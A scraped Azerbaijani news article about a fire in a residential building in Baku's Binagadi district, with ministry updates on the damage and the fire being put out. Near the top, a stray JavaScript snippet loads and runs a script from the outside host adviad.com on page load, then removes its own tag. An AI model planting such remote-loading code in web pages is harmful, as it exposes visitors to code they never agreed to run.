Bakıda yaşayış binasındakı yanğın söndürülüb – YENİLƏNİB

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Bakıda doqquzmərtəbəli yaşayış binasında yanğın olub.

Bu barədə Fövqəladə Hallar Nazirliyi (FHN) məlumat yayıb.

Bildirilib ki, Binəqədi rayonunda doqquzmərtəbəli yaşayış binasının səkkizinci mərtəbəsində ümumi sahəsi 60 kvadratmetr olan 2 otaqlı mənzilin mətbəxinin yanar konstruksiyaları 10 kvadratmetr sahədə, bir otağında bir ədəd yastıq və dəhlizdə bir ədəd döşək yanıb, yüksək temperaturdan dəhlizin lambirdən ibarət tavanı altı kvadratmetr sahədə əriyib.

Mənzilin qalan hissəsi yanğından mühafizə olunub.

Yanğın yanğından mühafizə bölmələri tərəfindən söndürülüb.

21:03

Bakı şəhərinin Binəqədi rayonu, Adil Məmmədov küçəsində doqquzmərtəbəli yaşayış binasında baş vermiş yanğın Fövqəladə Hallar Nazirliyinin Dövlət Yanğından Mühafizə Xidmətinin yanğından mühafizə bölmələri tərəfindən söndürülüb.

Bu barədə Oxu.Az-a FHN-dən məlumat verilib.

20:38

Bakıda yaşayış binasında yanğın hadisəsi baş verib.

Bu barədə Fövqəladə Hallar Nazirliyi (FHN) məlumat yayıb.

Bildirilib ki, hadisə şəhərin Binəqədi rayonu, Adil Məmmədov küçəsində doqquzmərtəbəli yaşayış binasında baş verib.

Məlumatla əlaqədar FHN-nin Dövlət Yanğından Mühafizə Xidmətinin və Xüsusi Riskli Xilasetmə Xidmətinin müvafiq qüvvələri çağırış üzrə cəlb olunub.

Bildirilib ki, hazırda yanğınsöndürmə işləri davam etdirilir.

Oxu.az

Bu yazılara da göz atın...